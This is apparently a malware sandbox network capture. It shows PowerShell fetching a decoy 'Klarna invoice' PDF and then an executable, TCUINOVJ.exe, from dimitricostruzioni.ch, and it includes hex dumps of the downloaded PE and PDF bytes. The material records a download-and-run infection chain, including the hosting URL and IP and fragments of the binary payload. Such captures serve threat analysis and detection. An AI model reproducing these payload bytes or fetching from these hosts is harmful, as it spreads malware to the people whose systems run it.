                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC16384INData Raw: 10 6a 2d 59 e8 3e de ff ff ff b5 dc fd ff ff ff 15 6c 22 41 00 83 f8 ff 74 37 6a 0e 68 e8 21 40 00 8b cb e8 72 04 00 00 ff b5 dc fd ff ff ff 15 68 22 41 00 a1 38 10 41 00 3b c7 74 14 f6 40 1c 10 74 0e ff 70 14 ff 70 10 6a 2e 59 e8 f6 dd ff ff 8b 8d dc fd ff ff 33 ff 8d 49 f0 e8 6a b4 ff ff 8b 8d d8 fd ff ff 8d 49 f0 e8 5c b4 ff ff 8b 8d d4 fd ff ff 8d 49 f0 e8 4e b4 ff ff 83 bd c4 fd ff ff 00 74 0c ff b5 c4 fd ff ff ff 15 64 20 41 00 8d 4e f0 e8 31 b4 ff ff 8d 8d ac fd ff ff e8 b7 05 00 00 8b c7 e8 06 6b 00 00 c2 0c 00 cc cc cc cc cc cc 6a 00 b8 ac fd 40 00 e8 1b 6b 00 00 8b 45 08 85 c0 74 38 8b 00 ba 08 22 40 00 66 8b 30 33 c9 41 66 3b 32 75 1e 66 85 f6 74 15 66 8b 70 02 66 3b 72 02 75 0f 83 c0 04 83 c2 04 66 85 f6 75 db 33 c0 eb 04 1b c0 0b c1 85 c0 74
                                                                                                                                                                                                                                              Data Ascii: j-Y>l"At7jh!@rh"A8A;t@tppj.Y3IjI\INtd AN1kj@kEt8"@f03Af;2uftfpf;rufu3t
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: dd 85 c0 fe ff ff dc 4d b0 de c1 d9 18 d9 85 1c ff ff ff d9 58 04 d9 85 18 ff ff ff d9 58 08 d9 85 14 ff ff ff d9 58 0c d9 85 10 ff ff ff d9 58 10 d9 85 0c ff ff ff d9 58 14 d9 85 08 ff ff ff d9 58 18 d9 85 e0 fe ff ff d9 58 1c d9 85 04 ff ff ff d9 58 20 d9 85 00 ff ff ff d9 58 24 d9 85 fc fe ff ff d9 58 28 d9 85 f8 fe ff ff d9 58 2c d9 85 f4 fe ff ff d9 58 30 d9 85 f0 fe ff ff d9 58 34 d9 85 ec fe ff ff d9 58 38 d9 85 e4 fe ff ff d9 58 3c d9 85 e8 fe ff ff d9 58 40 d9 85 d0 fe ff ff d9 58 44 d9 85 d4 fe ff ff d9 58 48 d9 85 d8 fe ff ff d9 58 4c d9 85 dc fe ff ff d9 58 50 d9 45 f4 d9 58 54 d9 45 ec d9 58 58 d9 45 e4 d9 58 5c d9 45 fc d9 58 60 c9 c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 60 d9 42 04 d8 05 44 16 41 00 8b 45 08 d9 5d fc d9 42 08 d8 05
                                                                                                                                                                                                                                              Data Ascii: MXXXXXXXX X$X(X,X0X4X8X<X@XDXHXLXPEXTEXXEX\EX`U`BDAE]B
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 40 1c 41 00 40 16 40 00 48 16 40 00 38 10 41 00 00 00 00 00 84 28 40 00 32 00 00 00 33 00 00 00 02 00 00 00 18 00 00 00 00 00 00 00 9c 28 40 00 42 00 00 00 43 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 b8 28 40 00 36 00 00 00 37 00 00 00 02 00 00 00 1c 00 00 00 00 00 00 00 cc 28 40 00 40 00 00 00 41 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 e4 28 40 00 3a 00 00 00 3b 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 fc 28 40 00 34 00 00 00 35 00 00 00 02 00 00 00 08 00 00 00 00 00 00 00 14 29 40 00 10 20 00 00 11 20 00 00 01 00 00 00 00 00 00 00 00 00 00 00 38 29 40 00 0e 20 00 00 0f 20 00 00 01 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: @A@@H@8A(@23(@BC(@67(@@A0(@:;(@45)@ 8)@
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 4d 00 55 00 49 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 10 00 00 00 65 00 6e 00 2d 00 55 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: MUIen-US
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 68 ff ff ff e8 dd 02 00 00 8b 45 1c 8b 8d dc fe ff ff 89 85 3c ff ff ff 8d 85 2c ff ff ff 50 89 9d 40 ff ff ff 89 b5 44 ff ff ff 89 9d 48 ff ff ff e8 b0 02 00 00 8b 45 14 89 85 1c ff ff ff 89 9d 20 ff ff ff 89 b5 24 ff ff ff 89 9d 28 ff ff ff 8b 45 10 89 9d 10 ff ff ff c7 85 14 ff ff ff 08 00 00 00 89 9d 18 ff ff ff 8b 00 89 85 0c ff ff ff 8d 85 ec fe ff ff 50 6a 11 53 53 ff b5 d8 fe ff ff ff b5 d4 fe ff ff e8 a3 fd ff ff 8b 4d fc 5f 5e 33 cd 5b e8 65 b0 00 00 c9 c2 44 00 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 60 01 00 00 a1 04 13 41 00 33 c5 89 45 fc 8b 45 18 89 85 a8 fe ff ff 8b 45 20 89 85 ac fe ff ff 8b 45 28 53 8b 5d 3c 89 85 b0 fe ff ff 8b 45 30 56 8b 75 48 89 85 b4 fe ff ff 8b 45 38 57 8b 7d 44 89 85 b8 fe ff ff 8d 45 ec 89 8d a0 fe ff ff 8b 4d 54
                                                                                                                                                                                                                                              Data Ascii: hE<,P@DHE $(EPjSSM_^3[eDU`A3EEE E(S]<E0VuHE8W}DEMT
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: f0 e8 b1 cc ff ff 8d 57 48 c6 45 fc 01 8d 4d f0 e8 50 02 00 00 8b ce ba 20 14 41 00 f7 d9 1b c9 81 c1 02 00 00 80 85 f6 75 05 ba a0 13 41 00 8b 75 f0 56 68 58 13 41 00 e8 4f fe ff ff 8d 4e f0 c6 45 fc 00 e8 82 c4 ff ff 8b 75 e8 85 f6 74 42 68 78 12 41 00 8d 4d f0 e8 5a cc ff ff c6 45 fc 02 84 db 74 03 83 c7 18 8b d7 8d 4d f0 e8 f3 01 00 00 8b 75 f0 ba 20 14 41 00 56 68 84 13 41 00 b9 01 00 00 80 e8 02 fe ff ff 8d 4e f0 e8 39 c4 ff ff 8b 75 ec 8d 4d e0 e8 f0 24 00 00 8b c6 e8 f4 7a 00 00 c3 cc cc cc cc cc cc 6a 1c b8 eb fb 40 00 e8 25 7b 00 00 8b f9 33 db 8d 4d e4 53 68 90 1f 40 00 89 5d ec e8 79 24 00 00 89 5d fc 89 5d d8 89 5d dc 89 5d e0 8d 4d f0 c6 45 fc 01 e8 53 67 00 00 68 06 00 02 00 8d 4d d8 ff 30 68 02 00 00 80 e8 53 e8 ff ff 8b 4d f0 8b f0 83 c1
                                                                                                                                                                                                                                              Data Ascii: WHEMP AuAuVhXAONEutBhxAMZEtMu AVhAN9uM$zj@%{3MSh@]y$]]]]MESghM0hSM
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 3b d0 74 10 66 89 3a 03 d7 3b d0 75 f7 8b 56 10 85 d2 74 60 85 db 8b fa 8b 5d 08 74 2c 0f b7 46 14 6b c8 2c 03 ca 3b d1 74 1f 8b 7e 0c 83 c2 08 39 7a fc 76 07 8b 02 3b 43 08 74 38 83 c2 2c 8d 42 f8 3b c1 75 ea 8b 7e 10 0f b7 46 16 33 d2 0f b7 4e 14 40 f7 f1 0f b7 c2 33 d2 6b c8 2c 42 66 89 46 16 8b 46 08 03 cf f0 0f c1 10 42 52 53 e8 b4 fd ff ff 5f 5e 5b 5d c2 04 00 cc cc cc cc cc cc 8b ff 55 8b ec 51 53 56 8b 35 ec 1c 41 00 33 db 57 8b fb 85 f6 74 51 39 5e 04 75 1c 8b 0e 8d 55 fc 89 5d fc e8 87 15 00 00 85 c0 78 0b 39 5e 04 75 06 8b 45 fc 89 46 04 8b 76 04 8d 46 10 f7 de 1b f6 23 f0 74 22 ff 15 e0 22 41 00 6a 0a 59 33 d2 8b f8 f7 f1 8b 4c 96 08 eb 07 39 39 74 10 8b 49 04 85 c9 75 f5 8b fb 8b c7 5f 5e 5b c9 c3 83 c1 08 8b f9 74 f2 39 59 08 75 ed 8d 46 04
                                                                                                                                                                                                                                              Data Ascii: ;tf:;uVt`]t,Fk,;t~9zv;Ct8,B;u~F3N@3k,BfFFBRS_^[]UQSV5A3WtQ9^uU]x9^uEFvF#t""AjY3L99tIu_^[t9YuF
                                                                                                                                                                                                                                              2024-12-21 13:59:04 UTC16384INData Raw: 04 41 00 e9 46 fb ff ff cc cc cc cc cc cc 8d 4d f0 e9 15 4c ff ff 8d 4d ec e9 0d 4c ff ff 8d 4d d4 e9 6d 69 ff ff 8d 4d e0 e9 fd 4b ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a cc 33 c8 e8 ba f0 ff ff b8 ac 04 41 00 e9 fe fa ff ff cc cc cc cc cc cc 8d 8d d4 fd ff ff e9 2c a5 ff ff 8d 8d e8 fd ff ff e9 2c 85 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a d0 fd ff ff 33 c8 e8 79 f0 ff ff 8b 4a fc 33 c8 e8 6f f0 ff ff b8 f0 04 41 00 e9 b3 fa ff ff cc cc cc cc cc cc 8d 4d f0 e9 ef 84 ff ff 8d 4d ec e9 e7 84 ff ff cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 8a 7c ff ff ff 33 c8 e8 34 f0 ff ff b8 24 05 41 00 e9 78 fa ff ff cc cc cc cc cc cc 90 90 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 11 f0 ff ff b8 74 02 41 00 e9 55 fa ff ff cc cc cc cc cc cc
                                                                                                                                                                                                                                              Data Ascii: AFMLMLMmiMKT$BJ3A,,T$B3yJ3oAMMT$B|34$AxT$BJ3tAU


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              1192.168.2.54970862.182.21.1054433396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC113OUTGET /new/files/Documents/KlarnaInvoice42611.pdf HTTP/1.1
                                                                                                                                                                                                                                              Host: dimitricostruzioni.ch
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              content-type: application/pdf
                                                                                                                                                                                                                                              last-modified: Thu, 19 Dec 2024 00:54:53 GMT
                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                              content-length: 114905
                                                                                                                                                                                                                                              date: Sat, 21 Dec 2024 13:59:08 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC1151INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 38 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 31 34 36 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 31 34 37 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 31 35 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e
                                                                                                                                                                                                                                              Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 18 0 R/MarkInfo<</Marked true>>/Metadata 146 0 R/ViewerPreferences 147 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 15 0 R] >>endobj3 0 obj<</Type/Page/Paren
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC14994INData Raw: e9 6a 1d f6 c0 4c d1 ec 69 60 aa 06 f6 90 d1 46 8e 3d 8d 4b f0 f2 ec 69 b3 f5 14 4c 05 3c d9 dd e0 f1 75 b3 60 a8 14 18 aa 49 dc 95 0c 95 5d c8 50 f9 a6 64 39 1f 47 43 75 0c 12 f8 08 86 aa 67 8d e4 8c 8f 0f 63 04 48 aa 73 9a 36 25 1c f0 16 5d 7c f1 65 9c b6 6a 2b 07 a9 34 aa 72 99 35 fe ea 97 e3 78 5c 6c cb 38 5a 70 ca a8 11 7e b6 a0 22 68 16 70 f6 08 c2 9a 31 f6 ac f8 dc 9c a4 89 a5 b9 e9 96 9a 9b d5 56 e7 04 3d 3a 54 2a 39 0c 97 1f 77 6e c4 bb 38 61 e1 1f fa 10 eb 78 0f d1 79 36 14 8d 0b 4c df 22 0e 9a ea 6a a7 7b 66 f7 0c df 70 02 4a 49 2a cb 14 be 4b ca e2 17 52 16 57 95 b4 77 54 59 4e e0 8f 85 cd 7c a3 40 4b ca c4 c9 6b 49 19 47 ef 94 01 6d 95 da a9 45 6b ba 3a 1d 92 37 5d 65 7a e4 4d d7 24 f9 96 b4 b1 96 ce 65 68 70 f6 21 c8 6d 98 f3 23 cc 4f 63 44
                                                                                                                                                                                                                                              Data Ascii: jLi`F=KiL<u`I]Pd9GCugcHs6%]|ej+4r5x\l8Zp~"hp1V=:T*9wn8axy6L"j{fpJI*KRWwTYN|@KkIGmEk:7]ezM$ehp!m#OcD
                                                                                                                                                                                                                                              2024-12-21 13:59:08 UTC16384INData Raw: 26 bc 71 f6 5c 55 f1 28 5d 71 fa f2 38 76 ec 78 f1 28 bd 0c 27 4e 7c 2b 7b 2f dd b7 ef bc 35 69 52 f6 5e fa fa 07 d2 d3 d8 b0 71 e3 c8 fd af b3 f7 52 51 59 99 3d 9a 36 6d fa 82 85 0b 87 86 86 b3 f7 92 5e 32 83 b9 a3 74 2f 33 67 7e 9c 7d 8c e9 5e de ff e0 83 ec d1 a6 4d 9b 27 4d 9a 94 be ba b2 f7 92 1e 63 f6 28 bd 5e d2 95 7d db bd b4 e4 ef 65 fc f8 f1 75 17 33 f7 92 fe 30 3d fc b3 e7 32 af 97 a6 e6 e6 89 6f bd 75 34 77 2f e9 a5 94 9e 70 f6 5e da 3b 3a 27 4f 99 92 bd 97 3b 77 7b de 7b ef fd f5 b9 d7 4b 7a 44 53 a7 4e ad a8 5c 95 fe 69 ca de cb a2 45 8b 06 87 32 ff b6 a4 7b 99 3f 7f 7e ff c0 40 f1 48 32 4c 01 00 10 da a3 31 4c 2d 5e bc 64 f5 9a 35 c5 a3 f4 d3 df ca 95 15 cb 97 af c8 be e1 c6 8d 1b 17 2c 58 98 3d da be e3 f3 39 73 e7 66 8f f6 ee fb a2 a4 b4
                                                                                                                                                                                                                                              Data Ascii: &q\U(]q8vx('N|+{/5iR^qRQY=6m^2t/3g~}^M'Mc(^}eu30=2ou4w/p^;:'O;w{{KzDSN\iE2{?~@H2L1L-^d5,X=9sf
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: bd e6 e1 53 5e 77 e5 d1 47 14 7d 2d a3 10 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 33 61 ca 18 63 8c 31 c6 98 36 1c 61 6a af 08 53 00 39 13 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 33 61 ca 18 63 8c 31 c6 98 36 1c 61 6a af 08 53 00 39 13 a6 8c 31 c6 18 63 8c 69 c3 11 a6 f6 8a 30 05 90 b3 54 98 7a 83 30 65 8c 31 c6 18 63 4c 9b cc 88 61 ea 15 c2 d4 ff 42 98 02 c8 59 23 4c f5 7d e5 1d c3 3f b6 2a ff f2 0f d1 ca bb aa e5 95 e9 a9 c5 51 d1 cf e6 41 71 b5 37 b9 9e e8 de a3 a3 a5 e7 ee 76 91 01 66 c7 fc e8 ee e7 47 ab 3e 1a 7e f3 a6 5f 44 77 1f 59 5d f7 8d e0 9b a3 35 9f 8f e6 be b0 ba e9 57 a1 37 af 88 96 5f 14 dd fb 92 ea 8e 05 81 37 97 96 47 8b ff 39 ba ff 75 e1 5f e4 d2 d2 68 fe 1b a2 87 fe 31 fc e6 de 85 d1 dc 69 d1 ca 4b 82 6f 8e 36 ff 36 ba
                                                                                                                                                                                                                                              Data Ascii: S^wG}-1ci03ac16ajS91ci03ac16ajS91ci0Tz0e1cLaBY#L}?*QAq7vfG>~_DwY]5W7_7G9u_h1iKo66
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 1c c3 94 46 23 c3 94 78 1d c3 94 38 86 29 05 0c 53 e2 18 a6 54 1a 19 a6 14 30 4c 01 40 14 30 4c 8d ea 3d 91 61 4a 1a c3 94 3c 86 29 8d 46 86 29 f1 46 86 29 71 0c 53 f2 7d 0c 53 0a 8d 0c 53 e2 18 a6 00 00 e5 82 61 6a 54 ef 89 0c 53 d2 18 a6 e4 31 4c 69 34 32 4c 89 37 32 4c 89 63 98 92 ef 63 98 52 68 64 98 12 c7 30 05 00 28 17 0c 53 a3 7a 4f 64 98 92 c6 30 25 8f 61 4a a3 91 61 4a bc 91 61 4a 1c c3 94 7c 1f c3 94 42 23 c3 94 38 86 29 00 40 b9 60 98 1a d5 7b 22 c3 94 34 86 29 79 0c 53 1a 8d 0c 53 e2 8d 0c 53 e2 18 a6 e4 fb 18 a6 14 1a 19 a6 c4 31 4c 01 00 ca 05 c3 d4 a8 de 13 19 a6 a4 31 4c c9 63 98 d2 68 64 98 12 6f 64 98 12 c7 30 25 df c7 30 a5 d0 c8 30 25 8e 61 0a 00 50 2e f6 a9 aa 58 fe d5 cf 6f 38 fb e4 5b 3e 7e 64 a1 1f 4b 1e 0c 53 8a 18 a6 c4 31 4c 69
                                                                                                                                                                                                                                              Data Ascii: F#x8)ST0L@0L=aJ<)F)F)qS}SSajTS1Li42L72LccRhd0(SzOd0%aJaJaJ|B#8)@`{"4)ySSS1L1Lchdod0%00%aP.Xo8[>~dKS1Li
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92 0c 88 24 19 24 92
                                                                                                                                                                                                                                              Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 01 db e9 ef 1a 09 02 38 16 7d 56 7e ea fe f4 8f 99 a5 71 c0 bf 49 25 59 4f c0 34 f4 33 05 0e ac e0 83 6d 68 e4 7e ec 97 a9 68 8e 91 dd a0 05 83 f6 2e 6d 00 cb f7 c8 39 f9 3d ac 20 23 5c 0a a7 d1 f2 5a 8d 8e e7 34 47 40 37 5a 0b b9 a3 89 ce e7 ce 77 bb 21 8c cc 1e 5d 70 24 48 a2 fa bb c8 4f dd 40 ee 63 46 1f d7 2e a0 33 05 5e 5b 0f 4f b0 a1 fe 44 c6 bf 14 74 db 60 f3 5f de 4a 85 ff ee a0 e9 81 55 7f 4d 3b fe 7c 98 ff b7 1e 8b 0a ff 58 d0 3c 04 ab ff 94 8e f6 87 d0 f5 a5 76 ab a1 fb bf 66 44 2a fc bd 80 9f 07 4b ff 9a 76 dc 75 30 ef 6f 3d 96 7f 46 e0 66 c3 e0 3f 7a 0c 2a a8 a0 82 0a ff 93 80 f7 c2 4d ff e8 31 a8 a0 c2 b9 40 b3 ef af 7b a6 52 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54 50 41 05 15 54
                                                                                                                                                                                                                                              Data Ascii: 8}V~qI%YO43mh~h.m9= #\Z4G@7Zw!]p$HO@cF.3^[ODt`_JUM;|X<vfD*Kvu0o=Ff?z*M1@{RATPATPATPATPATPATPATPAT
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC16384INData Raw: 8e f9 4e fa ce f8 ce fb be f6 5d f1 5d f7 73 fe 2c bf de 2f fb 6d 7e cd ef f5 97 f8 7b fb fb fb 07 fb 87 fb 47 f9 c7 fa c7 fb 23 fe b8 7f 92 7f 9a 7f ba 7f 96 7f ae 6b be 7f a1 7f 99 7f 95 7f 9d 7f a3 7f ab 7f b7 bf cd 7f d4 7f c2 7f da 7f ce 7f d1 7f d9 7f ad 88 68 c9 a2 cc 22 7d 91 b9 c8 59 e4 2d 2a 29 ea 5d d4 bf 68 70 51 59 51 79 d1 e8 a2 b1 45 55 45 13 8a ea f2 8f 14 35 14 4d 2b 9a 51 34 a7 68 61 d1 b2 a2 55 45 eb 8a 36 16 6d 29 da 51 b4 b7 a8 ad e8 48 d1 f1 a2 53 45 67 8b 2e 14 5d 2a ba 5a 74 23 20 04 72 02 c6 80 39 60 0f b8 03 fe 40 49 e0 ae 40 df 40 69 60 70 a0 2c 50 1e 18 1d 18 1b a8 0a 4c 08 d4 05 1a 02 53 03 cd 81 96 c0 9c c0 82 c0 92 c0 f2 c0 aa c0 da c0 fa c0 a6 c0 d6 c0 ce c0 fe c0 a1 c0 d1 c0 89 c0 e9 c0 b9 c0 c5 c0 e5 c0 b5 3b c8 1d 99 77
                                                                                                                                                                                                                                              Data Ascii: N]]s,/m~{G#kh"}Y-*)]hpQYQyEUE5M+Q4haUE6m)QHSEg.]*Zt# r9`@I@@i`p,PLS;w
                                                                                                                                                                                                                                              2024-12-21 13:59:09 UTC456INData Raw: 30 30 20 6e 0d 0a 30 30 30 30 30 38 31 32 31 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 31 39 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 38 30 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 30 37 38 33 30 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 31 31 30 30 38 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 31 31 31 30 35 34 20 30 30 30 30 30 20 6e 0d 0a 74 72 61 69 6c 65 72 0d 0a 3c 3c 2f 53 69 7a 65 20 31 34 39 2f 52 6f 6f 74 20 31 20 30 20 52 2f 49 6e 66 6f 20 31 37 20 30 20 52 2f 49 44 5b 3c 32 39 42 32 46 37 30 38 46 33 43 41 38 43 34 46 39 43 36 46 33 38 43 30 35 34 37 42 43 34 33 39 3e 3c 32 39 42 32 46 37 30 38 46 33 43 41 38 43 34 46 39 43 36 46 33 38 43 30 35 34 37 42 43 34 33 39 3e 5d 20 3e 3e 0d 0a 73 74 61 72 74 78 72 65
                                                                                                                                                                                                                                              Data Ascii: 00 n0000081214 00000 n0000107198 00000 n0000107802 00000 n0000107830 00000 n0000111008 00000 n0000111054 00000 ntrailer<</Size 149/Root 1 0 R/Info 17 0 R/ID[<29B2F708F3CA8C4F9C6F38C0547BC439><29B2F708F3CA8C4F9C6F38C0547BC439>] >>startxre


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              2192.168.2.54971062.182.21.1054433396C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC67OUTGET /dimitri/TCUINOVJ.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: dimitricostruzioni.ch
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              content-type: application/x-msdownload
                                                                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 17:38:53 GMT
                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                              content-length: 4151808
                                                                                                                                                                                                                                              date: Sat, 21 Dec 2024 13:59:11 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: MZ`@`!L!Require Windows$PEL~&L0@03P
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: e8 80 cc ff ff 83 c4 0c 85 c0 75 24 8b 06 8b 4d 08 66 83 7c 08 02 25 75 17 8d 43 02 50 57 8b ce e8 8c d8 ff ff ff 75 10 8b ce 57 e8 66 e1 ff ff 83 45 08 02 47 3b 7e 04 7c b1 5f 5e 5b 5d c3 55 8b ec 83 ec 70 56 8b 75 0c 57 68 28 73 41 00 8b ce e8 30 f0 ff ff 8b 7d 10 68 3c 73 41 00 8b cf e8 21 f0 ff ff 8b 46 04 48 50 6a 00 8d 45 f4 50 8b ce e8 cc f4 ff ff 8d 45 f4 50 8b ce e8 3f f0 ff ff ff 75 f4 e8 74 cd 00 00 8b 47 04 59 48 50 6a 00 8d 45 f4 50 8b cf e8 a6 f4 ff ff 8d 45 f4 50 8b cf e8 19 f0 ff ff ff 75 f4 e8 4e cd 00 00 ff 75 08 8d 45 90 68 dc 44 41 00 50 ff 15 cc 32 41 00 83 c4 10 8d 45 90 50 8b ce e8 26 f0 ff ff 8d 45 90 50 8b cf e8 1b f0 ff ff 5f 5e c9 c3 55 8b ec 83 ec 18 53 56 57 ff 75 08 8d 4d e8 e8 09 d6 ff ff 8d 45 e8 68 88 77 41 00 50 e8 7f e9
                                                                                                                                                                                                                                              Data Ascii: u$Mf|%uCPWuWfEG;~|_^[]UpVuWh(sA0}h<sA!FHPjEPEP?utGYHPjEPEPuNuEhDAP2AEP&EP_^USVWuMEhwAP
